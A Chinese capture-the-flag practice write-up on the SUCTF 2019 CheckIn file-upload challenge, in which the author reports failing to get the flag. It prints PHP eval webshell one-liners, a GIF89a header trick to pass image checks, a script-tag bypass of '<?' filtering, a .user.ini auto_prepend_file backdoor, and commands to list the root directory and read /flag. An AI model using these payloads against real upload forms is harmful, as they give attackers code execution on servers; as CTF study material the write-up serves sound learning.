练习 9 Web [SUCTF 2019]CheckIn (未拿到flag)

上传图片格式的木马文件:

返回 <? in contents!,存在PHP代码检测

上传非图片格式文件:

返回 不允许非image

修改木马PHP代码规避检测

php 复制代码
<? ?> 改为 < script language="php">< /script >

<?php @eval($_POST['shell']);?> 

<script language='php'>@eval($_POST['shell']);</script>

上传强行加上gif文件头的GIF图片木马

php 复制代码
GIF89a?<script language='php'>@eval($_POST['shell']);</script>

返回如下内容:上传文件位置

现在传上去,因为还是图片格式文件,没有办法执行

尝试在"练习5"中提到的.htaccess文件,发现也被过滤了

卡住,搜索其他wp

新内容:user.ini文件
SUCTF 2019CheckIn 1
user.ini文件构成的PHP后门
BUUCTF | SUCTF 2019CheckIn

因为本题过滤非图片格式,所以必须加上前面的"GIF89a"

php 复制代码
GIF89a                  //绕过exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自动解析的文件的名称,并包含该文件,就像使用require函数调用它一样。
auto_append_file=a.jpg  //解析后进行包含

uploads/18de044ce1c88142786756f6f8015474/index.php

cmd=var_dump(scandir("/"));

cmd=var_dump(file_get_contents("/flag"));

但最后始终刷不出来,不知道什么情况,蚁剑也死活连不上

相关推荐
林希_Rachel_傻希希几秒前
web性能之相关路径——AI总结
前端·javascript·面试
竹林8189 分钟前
用 wagmi v2 踩坑两天,我终于搞懂了多链钱包切换在 DeFi 前端中的正确姿势
前端·javascript
用户21366100357211 分钟前
Vue项目搜索功能与面包屑导航
前端·javascript
星栈15 分钟前
LiveView 的实时通信,爽是爽,但 PubSub 和广播也最容易把自己绕晕
前端·前端框架·elixir
用户29307509766916 分钟前
告别关键词匹配,拥抱向量语义 —— RAG 搜索从零到一
前端
独孤留白25 分钟前
从C到Rust:告别 C 的"指针 + 长度"手动模式
前端·rust
掘金安东尼1 小时前
中小厂前端候选人简历面试拆解:从 HR 面、技术面到主管面的双赢提问法
前端·面试
天平10 小时前
油猴脚本创建webworker踩坑记录
前端·javascript·typescript
原则猫11 小时前
前端基础大厦
前端